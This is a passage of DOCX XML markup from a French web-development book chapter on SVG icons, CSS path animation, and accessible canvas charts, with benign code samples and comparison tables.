          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des icônes sans répétition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 Icônes réutilisables avec &lt;symbol&gt; --&gt;</w:t>
        <w:br/>
        <w:t>&lt;svg aria-hidden="true" style="display:none"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;symbol id="icone-panier" viewBox="0 0 24 24"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;path d="M3 4h2l2.5 10h9L19 7H6" fill="none" stroke="currentColor"</w:t>
        <w:br/>
        <w:t xml:space="preserve">          stroke-width="2" stroke-linecap="round" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;circle cx="9" cy="19" r="1.6" fill="currentColor" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;circle cx="17" cy="19" r="1.6" fill="currentColor" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/symbol&gt;</w:t>
        <w:br/>
        <w:t>&lt;/svg&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Utilisation --&gt;</w:t>
        <w:br/>
        <w:t>&lt;svg class="icone" aria-hidden="true"&gt;&lt;use href="#icone-panier" /&gt;&lt;/svg&gt;</w:t>
        <w:br/>
        <w:t>&lt;span class="sr-only"&gt;Panier&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>42.3 Animer sans JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les animations SVG déclaratives suffisent pour la plupart des effets : tracé progressif, apparition, rotation. Elles respectent les préférences de mouvement si on les conditionne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une animation de tracé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Tracé progressif d'une courbe */</w:t>
        <w:br/>
        <w:t>.courbe {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stroke-dasharray: 600;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stroke-dashoffset: 600;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  animation: tracer 1.2s ease-out forwards;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@keyframes tracer {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  to { stroke-dashoffset: 0; }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (prefers-reduced-motion: reduce) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .courbe { animation: none; stroke-dashoffset: 0; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.141 — Quatre techniques d'animation</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97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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="198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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3977"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Animation CSS sur attributs de présentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1988"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Couleur, opacité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3977"/>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stroke-dashoffset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="198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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Tracé progressif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3977"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SMIL (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;animate&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1988"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sans CSS, support variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3977"/>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JavaScript (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>requestAnimationFrame</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="198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Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Interactions complexes</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PRÉFÉREZ `TRANSFORM` À LA MODIFICATION DE GÉOMÉTRIE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Animer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>width</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> force un recalcul de la mise en page. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>transform</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>opacity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sont composées par le GPU et restent fluides.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>42.4 Dessiner sur un canvas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le canvas exige de gérer soi-même la résolution, le redimensionnement et les interactions. En échange, il supporte des milliers d'objets sans alourdir le DOM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un graphique en canvas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&lt;canvas id="graphique" width="600" height="300"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        role="img"</w:t>
        <w:br/>
        <w:t>aria-label="Évolution mensuelle du trafic, de janvier à juin"&gt;&lt;/canvas&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t>const canvas = document.getElementById("graphique");</w:t>
        <w:br/>
        <w:t>const ctx = canvas.getContext("2d");</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Adapte la résolution à l'écran (écran haute densité)</w:t>
        <w:br/>
        <w:t>function ajuster() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const ratio = window.devicePixelRatio || 1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const rect = canvas.getBoundingClientRect();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  canvas.width  = rect.width  * ratio;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  canvas.height = rect.height * ratio;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ctx.setTransform(ratio, 0, 0, ratio, 0, 0);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  dessiner();</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>function dessiner() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const { width: w, height: h } = canvas.getBoundingClientRect();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ctx.clearRect(0, 0, w, h);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const donnees = [12, 19, 15, 28, 34, 41];</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const max = Math.max(...donnees);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const largeur = w / donnees.length;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  donnees.forEach((valeur, i) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const hauteur = (valeur / max) * (h - 40);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ctx.fillStyle = i === donnees.length - 1 ? "#E0A21B" : "#0F2E4C";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ctx.fillRect(i * largeur + 8, h - hauteur - 20, largeur - 16, hauteur);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ctx.fillStyle = "#1F2933";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ctx.font = "12px Arial";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ctx.fillText(valeur, i * largeur + 8, h - hauteur - 26);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>ajuster();</w:t>
        <w:br/>
        <w:t>window.addEventListener("resize", ajuster);</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.142 — Cinq pièges du canvas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04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Problème</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flou sur écran haute densité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Canvas non redimensionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>devicePixelRatio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Dessin décalé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Transform non réinitialisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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setTransform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coordonnées fausses au clic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taille CSS ≠ taille interne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Convertir par ratio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Consommation élevée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Boucle permanente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Dessiner à la demande</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Texte illisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pas de repli accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>aria-label</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + tableau</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UN CANVAS N'EST PAS ACCESSIBLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Placez toujours une alternative textuelle à proximité : tableau de données, description, ou la même information en HTML. Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>aria-label</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> seul ne remplace pas les valeurs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>42.5 Choisir et vérifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le choix se fait sur le volume d'objets, le besoin d'interaction et l'accessibilité. Une visualisation dense mais décorative peut être en canvas ; une figure porteuse d'information doit rester lisible par tous.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.143 — Cinq besoins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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Choix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
